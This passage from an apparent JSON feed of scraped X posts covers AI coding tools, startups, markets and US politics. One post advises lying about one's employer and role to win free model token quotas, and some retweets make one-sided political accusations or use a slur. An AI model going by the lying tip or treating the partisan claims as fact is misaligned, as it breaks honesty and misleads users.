has achieved escape velocity and will keep improving rapidly.", + "url": "https://x.com/sama/status/2048958572562710550", + "published_at": "2026-04-28T02:52:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048957950816137683", + "published_at": "2026-04-28T02:50:17+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Thomas Sowell: “Verbal virtuosity”.", + "url": "https://x.com/pmarca/status/2048954994842612091", + "published_at": "2026-04-28T02:38:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Key retardmaxxing method, 10/10 no notes.", + "url": "https://x.com/pmarca/status/2048954437897777249", + "published_at": "2026-04-28T02:36:20+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "看完这条想冲去把 CLAUDE.md 改长——先别。\n\n第二条实锤同意,Anthropic 自己 system prompt 几千 tokens,让用户写短是为了它自己留空间。\n\n但我认为「长 vs 短」不是真问题,「能否被自动加载 + 关键词 trigger」才是。\n\n我的 setup:rules/ 自动加载 + docs/ 按场景加载 + 关键词 trigger 写在 CLAUDE.md 主文件。复杂任务里 trigger 命中就 Read,子文档不会被忘读。Skill frontmatter 同理,写不够 router 选不对 = 跑了等于白跑。\n\n@frankfu1688 评论里说到点子上:长文档注意力稀释是线性甚至超线性,规则冲突指数级增长。这正是 trigger 的价值——不只是省 context,是保护核心规则的权重不被稀释。\n\n真问题是 trigger 写没写够。写够能分层,写不够老实塞主文档。", + "url": "https://x.com/runes_leo/status/2048952088361918479", + "published_at": "2026-04-28T02:27:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The smart people work for the… less smart people.", + "url": "https://x.com/pmarca/status/2048952024348373321", + "published_at": "2026-04-28T02:26:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "It wasn’t AI, it was the COVID hiring binge + interest rate spike hangover.", + "url": "https://x.com/pmarca/status/2048951609124909387", + "published_at": "2026-04-28T02:25:05+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "小扎当年在天安门跑步,跪舔了半天也没得到国家的好处,这次国家算是还了人情。半年后再看,谁还要收购这么个破玩意,小扎做梦都要笑醒了。\n\n创始团队也没啥损失,再搞一个项目很快就会拿到风投估值上亿。", + "url": "https://x.com/dingyi/status/2048948980655292914", + "published_at": "2026-04-28T02:14:39+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The top 0.1% of income earners in California make 12% of the state's total income and pay 27% of total income taxes.\n\nThe bottom 50% of income earners make 12% of total income and pay 3% of total income taxes.\n\nIf the 0.1% leave, the revenue gap must be filled through higher taxes from everyone else or lower public spending.", + "url": "https://x.com/charliebilello/status/2048946440173416655", + "published_at": "2026-04-28T02:04:33+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "嗯?快连(LetsVPN)跟老王VPN不一个背景的吗", + "url": "https://x.com/realNyarime/status/2048942460630688174", + "published_at": "2026-04-28T01:48:44+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "R to @charliebilello: A record 43% of these underwater car buyers are opting for 84-month (7-year) loans. Their average monthly payment: $932, the highest level ever recorded.", + "url": "https://x.com/charliebilello/status/2048940251079430151", + "published_at": "2026-04-28T01:39:57+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: 30% of car buyers trading in vehicles in the US now have negative equity, owing an average of $7,200 on their old loans.", + "url": "https://x.com/charliebilello/status/2048938813385269297", + "published_at": "2026-04-28T01:34:15+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What No One Knows That Everyone Should Know About Being CEO of a Public Company:\n\n\"The other thing that people miss is that the CEO's job in a company, especially one that's gone from small to very, very large, is an incredibly lonely, very stressful role.\n\nI don't know many founders who have had that kind of success, that have fantastic personal lives. You end up distracted from your kids 'cause you're always focused on work. It consumes you.\"\n\nLove to hear your thoughts @levie @Benioff @tobi @nejatian what does no one know that everyone should know about being a public company CEO?", + "url": "https://x.com/HarryStebbings/status/2048936233993413097", + "published_at": "2026-04-28T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "最让中文出圈的一次竟然就是AI这一波!\nYC 创始人都开始「出淤泥而不染」了。\n\n那么问题来了?谁是不染?", + "url": "https://x.com/berryxia/status/2048936142226309297", + "published_at": "2026-04-28T01:23:38+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "好消息,Outlook 终于特么支持Agent了。\n坏消息,国内是否也支持?", + "url": "https://x.com/berryxia/status/2048935713950064964", + "published_at": "2026-04-28T01:21:56+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc\n\nIn just one year, it has been almost completely dismantled\n\nOf 1500 scientists, only 124 remain\n\nhttps://www.nytimes.com/2026/04/27/climate/epa-science-trump-cuts.html?unlocked_article_code=1.eVA.yCwJ.TYSUUslTTFoa&smid=tw-share", + "url": "https://x.com/ylecun/status/2048931628995510596", + "published_at": "2026-04-28T01:05:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "\"default presumption is that productivity gains lead to increased demand. burden of persuasion is with the doomers to show why this time is gonna be different.\"", + "url": "https://x.com/pmarca/status/2048931314330685922", + "published_at": "2026-04-28T01:04:27+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Best ad for Grok imaginable.\n\n\"I can't manipulate this AI into lying to me.\"", + "url": "https://x.com/elonmusk/status/2048930958502482277", + "published_at": "2026-04-28T01:03:02+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "\"thats not a sign of an economy about to collapse, thats a sign of a tool so productive that time itself becomes the bottleneck.\"", + "url": "https://x.com/pmarca/status/2048929149205831923", + "published_at": "2026-04-28T00:55:51+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "境外组织挑动男女对立\n境外组织大力资助网红煽动躺平\n境外组织炮制“阶层固化”与“努力无用”论调\n境外组织全方位煽动各类“社会群体对立”\n境外组织利用“环保”、“动保”或“平权”等特定议题进行渗透\n\n对,都是海外势力搞得,我们是不可能存在任何缺点的!\n考公务员躺平没用,公务员是全世界最辛苦的职业,每天上24小时的班,还没下班又接着上班了", + "url": "https://x.com/realNyarime/status/2048928584379822356", + "published_at": "2026-04-28T00:53:36+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多", + "url": "https://x.com/bozhou_ai/status/2048921844175212590", + "published_at": "2026-04-28T00:26:49+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "3 周前立了个 flag:跑数据验证 4 条 Claude Code 缓存优化(/clear 改话题切换 / MEMORY.md 推迟 / 模型阶段切换 / /btw 长任务插问)。\n\n今天等长滑窗对比 4 周。\n\n· 命中率 96.7% → 96.3%(噪声内)\n· Msg/Session 118 → 137(W17 反而更长)\n· 4 条规则大部分是追认我本来就这样用\n\n真正涨的不是 cache 成本,是 output token 4 周 +5x — 写更多代码、长文、数据脚本。\n\nAnthropic prompt cache + Claude Code auto-load 已经把命中率推到 96% 结构性上限,行为级优化空间在 1pp 内。\n\nbonus:Max 订阅 $200/月 跑出等价 API $7-9K/周(~200x 杠杆)— 这才是 Max 真正的护城河。", + "url": "https://x.com/runes_leo/status/2048919121115631642", + "published_at": "2026-04-28T00:16:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "codex with the $20 plan is a really good deal", + "url": "https://x.com/sama/status/2048913887614115857", + "published_at": "2026-04-27T23:55:12+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 Claude Code 终于可以和浏览器并排实时控制了!\nYC 大佬推出 GStack Browser + /open-gstack-browser skill,调试体验直接起飞!\n\n1. 在 Claude Code 中输入 Install GStack 快速安装\n2. 输入 /open-gstack-browser 即可打开浏览器窗口\n3. 实现 Claude Code 和浏览器完全 side-by-side 操作\n4. 完美解决 Agent 调试时“看不见浏览器在干什么”的痛点\n\nClaude Code 重度用户和 AI Agent 开发者必装神器!\n\n项目地址:\nhttps://github.com/garrytan/gstack", + "url": "https://x.com/berryxia/status/2048911923983593818", + "published_at": "2026-04-27T23:47:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we love our users", + "url": "https://x.com/sama/status/2048910739784826966", + "published_at": "2026-04-27T23:42:41+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: 地址 https://developers.cloudflare.com/ai/models/minimax/music-2.6/", + "url": "https://x.com/berryxia/status/2048908812955070684", + "published_at": "2026-04-27T23:35:02+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "If you skip some or all of college to start a startup, it's on you to develop your mind the way college would have. And that's not something that happens by default in most startups.", + "url": "https://x.com/paulg/status/2048903314759196893", + "published_at": "2026-04-27T23:13:11+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: All three of the liberal justices dissented from the order allowing Texas to use their new congressional map.\n\nBut these same justices all voted with a unanimous court back in February to allow California to use its new maps.\n\nThe three liberal justices are simply progressive activists wearing black robes.", + "url": "https://x.com/elonmusk/status/2048900774025986532", + "published_at": "2026-04-27T23:03:05+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: China is blocking Meta’s Manus acquisition, and it might just be our news story of the year.\n\nIf a startup is strategically important, the CCP can just reach through with a “golden share” (a “symbolic” 1% / board seat / veto power) and kill the deal mid-flight…\n\nWhat Should Meta do? Unwind it and tell the VC’s to send the money back? 🤔", + "url": "https://x.com/jason/status/2048897167234826325", + "published_at": "2026-04-27T22:48:45+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: “Calling Trump a fascist incites political violence”\n\nHere’s a compilation of Trump calling his opponents fascists", + "url": "https://x.com/ylecun/status/2048879552022130882", + "published_at": "2026-04-27T21:38:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why it is sub-optimal for founders to also be angel investing:\n\n\"I don't invest anymore, for a couple reasons.\n\n1. In order to invest, you've got to sell shares in your own business to have liquidity to go invest.\n\nYou're selling from your own core business to go diversify. You're not focused on your day job.\n\nAnd for me, my goal in life is to make my company as good as it can possibly be.\n\nThree years from now, five years from now, 10 years from now, 20 years from now, if I, if I plot into the future, every second of my available time should be committed to it. Otherwise there's some loss.\n\nAnd as those losses start adding up, they can compound and it can make it less likely that you could succeed.\" Adam Foroughi, @AppLovin\n\nLove to hear your thoughts on this @dharmesh @alanchanguk @marcrandolph @immad @jaltma. Pros and cons?", + "url": "https://x.com/HarryStebbings/status/2048879359318958273", + "published_at": "2026-04-27T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Image", + "url": "https://x.com/jason/status/2048878709784928524", + "published_at": "2026-04-27T21:35:25+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: New work with @AlecRad and @DavidDuvenaud:\n\nHave you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. \n\nVintage models should help us to understand how LMs generalize (e.g., can we teach talkie to code?). Thread:", + "url": "https://x.com/karpathy/status/2048878495539843211", + "published_at": "2026-04-27T21:34:34+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Another one ☝️", + "url": "https://x.com/jason/status/2048876670090727866", + "published_at": "2026-04-27T21:27:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Since the start of the Iran war\nJet Fuel: +68%\nSulfur: +59%\nHeating Oil: +52%\nUrea: +49%\nBrent Crude Oil: +49%\nDiesel: +45%\nWTI Crude Oil: +44%\nEuropean Natural Gas: +38%\nGasoline: +38%\nFertilizer: +23%\nBitcoin: +15%\nPalm Oil: +12%\nCoal: +10%\nIron Ore: +8%\nS&P 500: +4%\n$VIX: -9%", + "url": "https://x.com/charliebilello/status/2048874268478382262", + "published_at": "2026-04-27T21:17:46+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the day at another all-time high, its 10th of the year.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048872600416243932", + "published_at": "2026-04-27T21:11:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: He is right", + "url": "https://x.com/ylecun/status/2048871429681148028", + "published_at": "2026-04-27T21:06:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song 2 (remix much better then original)\n\nhttps://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048865167233200586", + "published_at": "2026-04-27T20:41:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song\nhttps://www.youtube.com/watch?v=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048863662396658146", + "published_at": "2026-04-27T20:35:37+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The Truth About Being a CEO and a Parent:\n\n\"I felt like for my children, I became more distant 'cause I wasn't paying attention to them.\n\nI think any founder knows this experience. If they have kids, you hang out with your kids, but your mind is elsewhere. Either that or you're on your phone. So you're never really present.\n\nWhat I realized is, like almost in every relationship in my life, I was never really present. What I tried to do to change that is to take at least small moments. To feel like I was present.\n\nAnd so small moments might be 10 minutes at a time. But if I gave myself 10 minutes at a time to hang out with one of my children or a couple of my children, I felt like, okay, now I'm actually committing to them to be a hundred percent present.\"\n\nWhat is your single biggest advice to CEOs on how to be the best parent they can be @sama @alexisohanian @SahilBloom @chetanp?", + "url": "https://x.com/HarryStebbings/status/2048835822292725957", + "published_at": "2026-04-27T18:45:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: Wow I'm actually shocked that the SPLC was featured in the latest Nathan For You episode.", + "url": "https://x.com/pmarca/status/2048830598752739496", + "published_at": "2026-04-27T18:24:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.", + "url": "https://x.com/DavidSacks/status/2048821257534111863", + "published_at": "2026-04-27T17:47:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: x.com/a16z/status/1985413352…", + "url": "https://x.com/DavidSacks/status/2048813533136060459", + "published_at": "2026-04-27T17:16:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian future they claim to oppose. From last year:\n https://x.com/a16z/status/1985413352349413542/video/1?s=48", + "url": "https://x.com/DavidSacks/status/2048813311668486300", + "published_at": "2026-04-27T17:15:33+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "如果不想为Token付费,最好的方案就是在 http://openrouter.ai 上找一些免费模型或者限时免费模型来用Claude Code\n\n配置方案推荐阅读这篇文章", + "url": "https://x.com/Pluvio9yte/status/2048813303368138906", + "published_at": "2026-04-27T17:15:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "This Beanie Can Read Your Thoughts… https://x.com/i/broadcasts/1qGvvkZPWgRGB", + "url": "https://x.com/jason/status/2048812889838928269", + "published_at": "2026-04-27T17:13:52+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.", + "url": "https://x.com/DavidSacks/status/2048811495224390105", + "published_at": "2026-04-27T17:08:20+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "目前最有性价比的模型 GPT-5.5\n最有好的官订方案 Claude $100 + ChatGPT $100\n最有性价比的方案 Claude 中转站 + ChatGPT $100\n\n为什么 GPT-5.5 这么强并且语言输出改观之后还应该用Claude?\n\n1. 规划能力,Opus 仍然处于一流水准,GPT能补充方案但是不能进行规划。\n这里的规划并不是完完全全的规划,而是人永远无法给全上下文,永远要在一步步的讨论中得到最终方案。Sonnet/Opus 对人讲话的理解能力以及上下文的记忆,是远远比 GPT 要强的。\n\n2. 生态\n目前Claude的生态仍然是断档领先OpenAI,从APP到应用程序,以及Claude Design,基本都领先于OpenAI\n\n内容太多了,改天会开篇文章单独讲一下这些", + "url": "https://x.com/Pluvio9yte/status/2048810385105686557", + "published_at": "2026-04-27T17:03:55+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: A completely local agent that lives right inside your browser.\n\nPowered by Gemma 4 E2B and WebGPU, it uses native tool calling to:\n\n🔍 Search browsing history\n📄 Read and summarize pages\n🔗 Manage tabs\n\n100% local. No servers needed!", + "url": "https://x.com/frxiaobei/status/2048805789788413984", + "published_at": "2026-04-27T16:45:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Amazing", + "url": "https://x.com/frxiaobei/status/2048805385537306677", + "published_at": "2026-04-27T16:44:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil", + "url": "https://x.com/eladgil/status/2048803386938495412", + "published_at": "2026-04-27T16:36:07+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。\n\n但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。\n\n像极了刚走向社会的二愣子。", + "url": "https://x.com/frxiaobei/status/2048802517237350599", + "published_at": "2026-04-27T16:32:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。\n😤\n虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。", + "url": "https://x.com/frxiaobei/status/2048800504206282887", + "published_at": "2026-04-27T16:24:39+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "美团旗下龙猫新模型LongCat-2.0-Preview专属额度,内测期间将根据负载情况每日不定期多次刷新,新模型限时申请👉https://longcat.chat/platform\n每天1000万token额度,差不多2小时重置一下额度,使劲薅!\n另外还有几个模型LongCat-Flash-Chat、\nLongCat-Flash-Thinking-2601、\nLongCat-Flash-Omni-2603可以申请每天500万token额度,小作文随便写一下,就说你是哪个大公司的一个负责人,要干啥干啥,基本上都能过", + "url": "https://x.com/realNyarime/status/2048799821746897247", + "published_at": "2026-04-27T16:21:57+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com/charliebilello/status/2048799590044852390", + "published_at": "2026-04-27T16:21:01+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "刷到这条对照了一下自己的进度,他说的大半路径我正在跑,而且已经有点成果。\n\n过去半年搭起了 http://leolabs.me 当主站,业务线一条条开:\nPM 策略实盘 / 付费长文 + 策略包 / 开源工具 / X 中文圈深耕 / TG 频道运营。\n\n没雇过一个人。Codex 和 Claude 是两个学徒,多窗口当分身用。\n\n体感最深的是第 11 条——把成果反馈给 AI 问怎么优化,循环顺到能撬出额外杠杆。\n\nAI 时代个体最大的杠杆,不是学方法,是让 agent 接手重复动作。", + "url": "https://x.com/runes_leo/status/2048788762646184092", + "published_at": "2026-04-27T15:38:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "我不说你们自己看\n同一套提示词\nhappyhorse和seedance2\n赛博商K以后可以当视频模型的基准测试了", + "url": "https://x.com/CuiMao/status/2048786486435492337", + "published_at": "2026-04-27T15:28:57+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 years. Supporters of this action live in a fantasy dystopia about how science operates.", + "url": "https://x.com/ylecun/status/2048779086168838610", + "published_at": "2026-04-27T14:59:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: When I wrote The New White Nationalism in America in 2002, there were roughly 2,000 KKK members left in the entire nation — and a large percentage were suspected paid informants.\n\nReal hate groups were so sparse that the Southern Poverty Law Center was being openly accused of inflating numbers to scare Holocaust survivors and other donors. Their annual “hate map” literally required them to invent new threats every year just to keep the fundraising machine running.\n\nBack then, a “white supremacist” actually meant someone who believed their own race was superior to others.\n\nThen came the Obama administration’s tight collaboration with the SPLC — and everything changed. Suddenly all whites could be branded “privileged racists” by default.\nMy book warned that identity politics, racial grievance culture, and the suppression of honest debate would breed exactly this kind of backlash and division. It was a call for genuine integration and color-blind justice instead.\n\nIgnored then. More relevant than ever now — especially after the SPLC’s recent federal fraud indictment for allegedly paying millions to informants inside the very extremist groups it claims to oppose.\nRead the prescient warning here:\nhttps://www.aei.org/articles/the-new-white-nationalism-in-america/\n(Full book available on Amazon/Cambridge University Press)\n#SPLCFraud #SPLCIndicted #SPLCExposed #HateMap #HateForProfit", + "url": "https://x.com/elonmusk/status/2048765165533868432", + "published_at": "2026-04-27T14:04:14+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://x.com/HarryStebbings/status/2048764743205134644", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2048764741435179442", + "published_at": "2026-04-27T14:02:33+00:00", + "source": 